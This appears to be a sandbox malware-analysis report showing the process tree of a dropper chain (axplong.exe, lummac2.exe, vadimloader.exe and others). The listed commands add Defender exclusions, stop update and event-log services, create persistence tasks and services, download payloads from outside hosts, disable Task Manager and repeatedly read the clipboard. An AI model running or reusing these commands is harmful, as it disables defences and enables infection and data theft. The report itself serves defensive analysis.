PID 1856 wrote to memory of 4452	1856	941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe	axplong.exe
PID 1856 wrote to memory of 4452	1856	941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe	axplong.exe
PID 1856 wrote to memory of 4452	1856	941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe	axplong.exe
PID 4452 wrote to memory of 4660	4452	axplong.exe	ama.exe
PID 4452 wrote to memory of 4660	4452	axplong.exe	ama.exe
PID 4452 wrote to memory of 4660	4452	axplong.exe	ama.exe
PID 4452 wrote to memory of 532	4452	axplong.exe	gold.exe
PID 4452 wrote to memory of 532	4452	axplong.exe	gold.exe
PID 4452 wrote to memory of 532	4452	axplong.exe	gold.exe
PID 532 wrote to memory of 3156	532	gold.exe	RegAsm.exe
PID 532 wrote to memory of 3156	532	gold.exe	RegAsm.exe
PID 532 wrote to memory of 3156	532	gold.exe	RegAsm.exe
PID 532 wrote to memory of 3156	532	gold.exe	RegAsm.exe
PID 532 wrote to memory of 3156	532	gold.exe	RegAsm.exe
PID 532 wrote to memory of 3156	532	gold.exe	RegAsm.exe
PID 532 wrote to memory of 3156	532	gold.exe	RegAsm.exe
PID 532 wrote to memory of 3156	532	gold.exe	RegAsm.exe
PID 4452 wrote to memory of 3520	4452	axplong.exe	lummac2.exe
PID 4452 wrote to memory of 3520	4452	axplong.exe	lummac2.exe
PID 4452 wrote to memory of 3520	4452	axplong.exe	lummac2.exe
PID 4452 wrote to memory of 336	4452	axplong.exe	NewLatest.exe
PID 4452 wrote to memory of 336	4452	axplong.exe	NewLatest.exe
PID 4452 wrote to memory of 336	4452	axplong.exe	NewLatest.exe
PID 336 wrote to memory of 2264	336	NewLatest.exe	Hkbsse.exe
PID 336 wrote to memory of 2264	336	NewLatest.exe	Hkbsse.exe
PID 336 wrote to memory of 2264	336	NewLatest.exe	Hkbsse.exe
PID 4452 wrote to memory of 3312	4452	axplong.exe	Installer.exe
PID 4452 wrote to memory of 3312	4452	axplong.exe	Installer.exe
PID 3312 wrote to memory of 4700	3312	Installer.exe	cmd.exe
PID 3312 wrote to memory of 4700	3312	Installer.exe	cmd.exe
PID 4700 wrote to memory of 4880	4700	cmd.exe	schtasks.exe
PID 4700 wrote to memory of 4880	4700	cmd.exe	schtasks.exe
PID 4700 wrote to memory of 3908	4700	cmd.exe	schtasks.exe
PID 4700 wrote to memory of 3908	4700	cmd.exe	schtasks.exe
PID 4700 wrote to memory of 1384	4700	cmd.exe	powershell.exe
PID 4700 wrote to memory of 1384	4700	cmd.exe	powershell.exe
PID 4452 wrote to memory of 2820	4452	axplong.exe	legs.exe
PID 4452 wrote to memory of 2820	4452	axplong.exe	legs.exe
PID 4452 wrote to memory of 2820	4452	axplong.exe	legs.exe
PID 2820 wrote to memory of 5080	2820	legs.exe	RegAsm.exe
PID 2820 wrote to memory of 5080	2820	legs.exe	RegAsm.exe
PID 2820 wrote to memory of 5080	2820	legs.exe	RegAsm.exe
PID 2820 wrote to memory of 5080	2820	legs.exe	RegAsm.exe
PID 2820 wrote to memory of 5080	2820	legs.exe	RegAsm.exe
PID 2820 wrote to memory of 5080	2820	legs.exe	RegAsm.exe
PID 2820 wrote to memory of 5080	2820	legs.exe	RegAsm.exe
PID 2820 wrote to memory of 5080	2820	legs.exe	RegAsm.exe
PID 4700 wrote to memory of 4952	4700	cmd.exe	powershell.exe
PID 4700 wrote to memory of 4952	4700	cmd.exe	powershell.exe
PID 4952 wrote to memory of 572	4952	powershell.exe	cmd.exe
PID 4952 wrote to memory of 572	4952	powershell.exe	cmd.exe
PID 2264 wrote to memory of 4376	2264	Hkbsse.exe	1.exe
PID 2264 wrote to memory of 4376	2264	Hkbsse.exe	1.exe
PID 2264 wrote to memory of 4376	2264	Hkbsse.exe	1.exe
PID 4700 wrote to memory of 1124	4700	cmd.exe	powershell.exe
PID 4700 wrote to memory of 1124	4700	cmd.exe	powershell.exe
PID 572 wrote to memory of 4036	572	cmd.exe	schtasks.exe
PID 572 wrote to memory of 4036	572	cmd.exe	schtasks.exe
PID 572 wrote to memory of 4416	572	cmd.exe	reg.exe
PID 572 wrote to memory of 4416	572	cmd.exe	reg.exe
PID 572 wrote to memory of 4044	572	cmd.exe	schtasks.exe
PID 572 wrote to memory of 4044	572	cmd.exe	schtasks.exe
PID 572 wrote to memory of 2552	572	cmd.exe	schtasks.exe
PID 572 wrote to memory of 2552	572	cmd.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe
"C:\Users\Admin\AppData\Local\Temp\941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1856

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4452

C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4660

C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:532

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:3156

C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
"C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
3⤵
- Executes dropped EXE
PID:3520

C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:336

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2264

C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe
"C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe"
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:4376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 352
6⤵
- Program crash
PID:4372

C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exe"
5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:944

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:4284

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
7⤵
PID:2132

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
6⤵
- Launches sc.exe
PID:3276

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:4308

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
6⤵
- Launches sc.exe
PID:3808

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
6⤵
- Launches sc.exe
PID:4416

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
6⤵
- Launches sc.exe
PID:368

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
6⤵
- Power Settings
PID:4388

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
6⤵
- Power Settings
PID:1096

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
6⤵
- Power Settings
PID:3028

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
6⤵
- Power Settings
PID:3060

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
6⤵
- Launches sc.exe
PID:4672

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
6⤵
- Launches sc.exe
PID:2436

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
6⤵
- Launches sc.exe
PID:3576

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
6⤵
- Launches sc.exe
PID:1124

C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3312

C:\Windows\SYSTEM32\cmd.exe
cmd /c ins.bat
4⤵
- Suspicious use of WriteProcessMemory
PID:4700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
5⤵
- Scheduled Task/Job: Scheduled Task
PID:4880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
5⤵
- Scheduled Task/Job: Scheduled Task
PID:3908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"
6⤵
- Suspicious use of WriteProcessMemory
PID:572

C:\Windows\system32\schtasks.exe
schtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
7⤵
- Scheduled Task/Job: Scheduled Task
PID:4036

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
7⤵
- Modifies registry key
PID:4416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
7⤵
- Scheduled Task/Job: Scheduled Task
PID:4044

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
7⤵
- Scheduled Task/Job: Scheduled Task
PID:2552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Corporation.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Corporation'"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3492

C:\Windows\system32\schtasks.exe
schtasks /query /TN "Cleaner"
5⤵
PID:4560

C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe
"C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2820

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 240
4⤵
- Program crash
PID:2116

C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe
"C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4812

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
4⤵
PID:3944

C:\Users\Admin\AppData\Local\Temp\1000098001\vadimloader.exe
"C:\Users\Admin\AppData\Local\Temp\1000098001\vadimloader.exe"
3⤵
- Executes dropped EXE
PID:872

C:\Users\Admin\AppData\Local\Temp\onefile_872_133636606224686203\vadimloader.exe
"C:\Users\Admin\AppData\Local\Temp\1000098001\vadimloader.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4944

C:\Windows\SYSTEM32\hostname.exe
hostname
5⤵
PID:1504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid | more +1"
5⤵
PID:2504

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1376

C:\Windows\system32\more.com
more +1
6⤵
PID:3408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic OS get caption, osarchitecture | more +1"
5⤵
PID:964

C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\system32\more.com
more +1
6⤵
PID:1216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic cpu get name | more +1"
5⤵
PID:932

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
6⤵
PID:396

C:\Windows\system32\more.com
more +1
6⤵
PID:2304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic PATH Win32_VideoController get name | more +1"
5⤵
PID:732

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController get name
6⤵
- Detects videocard installed
PID:528

C:\Windows\system32\more.com
more +1
6⤵
PID:2432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory | more +1"
5⤵
PID:3060

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
6⤵
PID:1440

C:\Windows\system32\more.com
more +1
6⤵
PID:3028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""
5⤵
PID:2192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:5056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:5056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:5088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
